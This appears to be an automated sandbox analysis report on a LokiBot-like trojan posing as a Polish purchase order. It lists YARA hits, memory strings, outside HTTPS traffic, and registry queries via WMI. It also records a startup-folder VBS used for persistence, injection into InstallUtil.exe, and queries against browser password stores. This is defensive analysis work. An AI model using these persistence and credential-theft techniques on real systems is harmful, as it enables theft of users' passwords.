Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000002.00000002.3308084634.0000000003660000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3308180421.00000000038D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015EE9B0	0_2_015EE9B0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015ECF30	0_2_015ECF30
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9058	0_2_015E9058
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9048	0_2_015E9048
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E9660	0_2_015E9660
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_015E96C0	0_2_015E96C0
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80040	0_2_05F80040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_05F80006	0_2_05F80006
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076FDE60	0_2_076FDE60
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0040	0_2_076E0040
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Code function: 0_2_076E0022	0_2_076E0022
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013CCF30	6_2_013CCF30
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9058	6_2_013C9058
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9048	6_2_013C9048
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C9660	6_2_013C9660
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_013C96C0	6_2_013C96C0
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074DDE60	6_2_074DDE60
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0040	6_2_074C0040
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Code function: 6_2_074C0006	6_2_074C0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0040BDEF	7_2_0040BDEF

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.43ab5c8.13.raw.unpack, F3SOmS1RfeVd8H521qy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.6fd0000.17.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: InstallUtil.exe	Binary or memory string: C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe, 00000002.00000002.3304176080.0000000000436000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000428000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: <@*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: `C6-@`C*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: InstallUtil.exe	Binary or memory string: @*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/5@2/2

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Mutant created: NULL

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: InstallUtil.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogfirebirdULzauCAPrOnmUabaculus.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

File read: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe "C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll	Jump to behavior
